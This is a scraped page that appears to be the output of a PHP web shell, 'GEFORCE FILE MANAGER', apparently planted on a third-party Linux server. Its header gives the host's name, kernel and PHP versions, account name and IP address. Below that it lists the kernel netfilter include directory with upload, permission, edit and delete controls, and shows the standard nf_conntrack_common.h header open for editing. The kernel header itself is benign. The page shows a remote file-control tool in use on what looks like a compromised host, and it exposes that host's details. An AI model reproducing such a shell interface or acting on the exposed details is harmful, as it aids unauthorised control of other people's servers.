[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
include
/
linux
/
netfilter
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 ipset
SET
[ DEL ]
📄 nf_conntrack_common.h
4,588 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_conntrack_ftp.h
438 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_conntrack_sctp.h
576 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_conntrack_tcp.h
1,415 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_conntrack_tuple_common.h
896 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_log.h
538 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_nat.h
1,522 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_osf.h
1,948 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_tables.h
49,401 B
SET
[ EDIT ]
|
[ DEL ]
📄 nf_tables_compat.h
731 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink.h
2,428 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_acct.h
900 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_compat.h
2,444 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_conntrack.h
6,160 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_cthelper.h
1,202 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_cttimeout.h
2,930 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_log.h
2,799 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfnetlink_queue.h
3,499 B
SET
[ EDIT ]
|
[ DEL ]
📄 x_tables.h
4,467 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_AUDIT.h
718 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_CHECKSUM.h
563 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_CLASSIFY.h
217 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_CONNMARK.h
199 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_CONNSECMARK.h
301 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_CT.h
853 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_DSCP.h
697 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_HMARK.h
933 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_IDLETIMER.h
1,393 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_LED.h
470 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_LOG.h
642 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_MARK.h
184 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_NFLOG.h
556 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_NFQUEUE.h
779 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_RATEEST.h
390 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_SECMARK.h
648 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_SYNPROXY.h
419 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_TCPMSS.h
235 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_TCPOPTSTRIP.h
407 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_TEE.h
333 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_TPROXY.h
575 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_addrtype.h
1,084 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_bpf.h
935 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_cgroup.h
463 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_cluster.h
374 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_comment.h
230 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_connbytes.h
577 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_connlabel.h
360 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_connlimit.h
575 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_connmark.h
900 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_conntrack.h
2,557 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_cpu.h
199 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_dccp.h
483 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_devgroup.h
429 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_dscp.h
701 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_ecn.h
736 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_esp.h
418 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_hashlimit.h
3,256 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_helper.h
188 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_ipcomp.h
485 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_iprange.h
581 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_ipvs.h
680 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_l2tp.h
739 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_length.h
221 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_limit.h
673 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_mac.h
227 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_mark.h
260 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_multiport.h
721 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_nfacct.h
301 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_osf.h
1,833 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_owner.h
420 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_physdev.h
553 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_pkttype.h
188 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_policy.h
1,022 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_quota.h
400 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_rateest.h
859 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_realm.h
220 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_recent.h
1,058 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_rpfilter.h
320 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_sctp.h
2,326 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_set.h
1,827 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_socket.h
640 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_state.h
331 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_statistic.h
716 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_string.h
664 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_tcpmss.h
253 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_tcpudp.h
1,250 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_time.h
730 B
SET
[ EDIT ]
|
[ DEL ]
📄 xt_u32.h
752 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: nf_conntrack_common.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _NF_CONNTRACK_COMMON_H #define _NF_CONNTRACK_COMMON_H /* Connection state tracking for netfilter. This is separated from, but required by, the NAT layer; it can also be used by an iptables extension. */ enum ip_conntrack_info { /* Part of an established connection (either direction). */ IP_CT_ESTABLISHED, /* Like NEW, but related to an existing connection, or ICMP error (in either direction). */ IP_CT_RELATED, /* Started a new connection to track (only IP_CT_DIR_ORIGINAL); may be a retransmission. */ IP_CT_NEW, /* >= this indicates reply direction */ IP_CT_IS_REPLY, IP_CT_ESTABLISHED_REPLY = IP_CT_ESTABLISHED + IP_CT_IS_REPLY, IP_CT_RELATED_REPLY = IP_CT_RELATED + IP_CT_IS_REPLY, /* No NEW in reply direction. */ /* Number of distinct IP_CT types. */ IP_CT_NUMBER, /* only for userspace compatibility */ IP_CT_NEW_REPLY = IP_CT_NUMBER, }; #define NF_CT_STATE_INVALID_BIT (1 << 0) #define NF_CT_STATE_BIT(ctinfo) (1 << ((ctinfo) % IP_CT_IS_REPLY + 1)) #define NF_CT_STATE_UNTRACKED_BIT (1 << 6) /* Bitset representing status of connection. */ enum ip_conntrack_status { /* It's an expected connection: bit 0 set. This bit never changed */ IPS_EXPECTED_BIT = 0, IPS_EXPECTED = (1 << IPS_EXPECTED_BIT), /* We've seen packets both ways: bit 1 set. Can be set, not unset. */ IPS_SEEN_REPLY_BIT = 1, IPS_SEEN_REPLY = (1 << IPS_SEEN_REPLY_BIT), /* Conntrack should never be early-expired. */ IPS_ASSURED_BIT = 2, IPS_ASSURED = (1 << IPS_ASSURED_BIT), /* Connection is confirmed: originating packet has left box */ IPS_CONFIRMED_BIT = 3, IPS_CONFIRMED = (1 << IPS_CONFIRMED_BIT), /* Connection needs src nat in orig dir. This bit never changed. */ IPS_SRC_NAT_BIT = 4, IPS_SRC_NAT = (1 << IPS_SRC_NAT_BIT), /* Connection needs dst nat in orig dir. This bit never changed. */ IPS_DST_NAT_BIT = 5, IPS_DST_NAT = (1 << IPS_DST_NAT_BIT), /* Both together. */ IPS_NAT_MASK = (IPS_DST_NAT | IPS_SRC_NAT), /* Connection needs TCP sequence adjusted. */ IPS_SEQ_ADJUST_BIT = 6, IPS_SEQ_ADJUST = (1 << IPS_SEQ_ADJUST_BIT), /* NAT initialization bits. */ IPS_SRC_NAT_DONE_BIT = 7, IPS_SRC_NAT_DONE = (1 << IPS_SRC_NAT_DONE_BIT), IPS_DST_NAT_DONE_BIT = 8, IPS_DST_NAT_DONE = (1 << IPS_DST_NAT_DONE_BIT), /* Both together */ IPS_NAT_DONE_MASK = (IPS_DST_NAT_DONE | IPS_SRC_NAT_DONE), /* Connection is dying (removed from lists), can not be unset. */ IPS_DYING_BIT = 9, IPS_DYING = (1 << IPS_DYING_BIT), /* Connection has fixed timeout. */ IPS_FIXED_TIMEOUT_BIT = 10, IPS_FIXED_TIMEOUT = (1 << IPS_FIXED_TIMEOUT_BIT), /* Conntrack is a template */ IPS_TEMPLATE_BIT = 11, IPS_TEMPLATE = (1 << IPS_TEMPLATE_BIT), /* Conntrack is a fake untracked entry. Obsolete and not used anymore */ IPS_UNTRACKED_BIT = 12, IPS_UNTRACKED = (1 << IPS_UNTRACKED_BIT), /* Conntrack got a helper explicitly attached (ruleset, ctnetlink). */ IPS_HELPER_BIT = 13, IPS_HELPER = (1 << IPS_HELPER_BIT), /* Conntrack has been offloaded to flow table. */ IPS_OFFLOAD_BIT = 14, IPS_OFFLOAD = (1 << IPS_OFFLOAD_BIT), /* Conntrack has been offloaded to hardware. */ IPS_HW_OFFLOAD_BIT = 15, IPS_HW_OFFLOAD = (1 << IPS_HW_OFFLOAD_BIT), /* Be careful here, modifying these bits can make things messy, * so don't let users modify them directly. */ IPS_UNCHANGEABLE_MASK = (IPS_NAT_DONE_MASK | IPS_NAT_MASK | IPS_EXPECTED | IPS_CONFIRMED | IPS_DYING | IPS_SEQ_ADJUST | IPS_TEMPLATE | IPS_UNTRACKED | IPS_OFFLOAD | IPS_HW_OFFLOAD), __IPS_MAX_BIT = 16, }; /* Connection tracking event types */ enum ip_conntrack_events { IPCT_NEW, /* new conntrack */ IPCT_RELATED, /* related conntrack */ IPCT_DESTROY, /* destroyed conntrack */ IPCT_REPLY, /* connection has seen two-way traffic */ IPCT_ASSURED, /* connection status has changed to assured */ IPCT_PROTOINFO, /* protocol information has changed */ IPCT_HELPER, /* new helper has been set */ IPCT_MARK, /* new mark has been set */ IPCT_SEQADJ, /* sequence adjustment has changed */ IPCT_NATSEQADJ = IPCT_SEQADJ, IPCT_SECMARK, /* new security mark has been set */ IPCT_LABEL, /* new connlabel has been set */ IPCT_SYNPROXY, /* synproxy has been set */ }; enum ip_conntrack_expect_events { IPEXP_NEW, /* new expectation */ IPEXP_DESTROY, /* destroyed expectation */ }; /* expectation flags */ #define NF_CT_EXPECT_PERMANENT 0x1 #define NF_CT_EXPECT_INACTIVE 0x2 #define NF_CT_EXPECT_USERSPACE 0x4 #endif /* _NF_CONNTRACK_COMMON_H */